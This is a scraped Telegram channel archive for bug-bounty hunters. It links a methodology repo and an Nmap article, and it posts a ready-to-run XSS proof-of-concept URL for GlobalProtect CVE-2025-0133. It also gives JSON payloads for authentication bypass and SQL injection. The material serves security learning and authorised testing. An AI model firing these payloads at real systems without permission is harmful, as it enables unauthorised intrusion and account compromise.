Bug Bounty - GitBook
前往频道在 Telegram
7 429
订阅者
+424 小时
+207 天
+16430 天
帖子存档
7 431
🚨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
✅ Download: https://github.com/alihussainzada/BugHunterMethodology/
7 431
Vulnerability Scanning with Nmap - Black Hills Information Security, Inc. https://www.blackhillsinfosec.com/vulnerability-scanning-with-nmap/
7 431
The recently disclosed XSS vulnerability in GlobalProtect (CVE-2025-0133) has affected hundreds of thousands of organizations worldwide — including thousands of bug bounty programs.
Try your luck by running this PoC
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
http://GitBook_s.t.me7 431
سلام بچه ها
ما یه تاپیک زدیم با بچه های امنیت که صرفا از دست حواشی خلاص بشیم و مسیر یادگیری رو بدون پیچ و خم جلو ببریم
از شما دوستان دعوت میکنم به خانواده ما بپیوندید
@sec_gap 👈👈👈
در صورتی که تو جمع خودمون ببینمتون خوشحال میشم ❤️
7 431
1) Check request JSON for empty data/array.
Auth Bypass Example
❌ {"login":"user", "pass":"asd"}
✅ {} or {"_":"_"}
2) check for SQL Injection in JSON keys
SQL injection Example
✅ {"login\" or 1=1 -- -":"user"}
🔗 Article Link
https://liveoverflow.com/authentication-bypassing-in-codeigniter-due-to-empty-where-clause/
@GitBook_s
7 431
عزیزانی ک پادکست ها رو گوش کردید
دو هفته گذشته
گوش کردید
خوشتون اومد
نظر بدید
现已上线!2025 年 Telegram 研究 — 年度关键洞察 
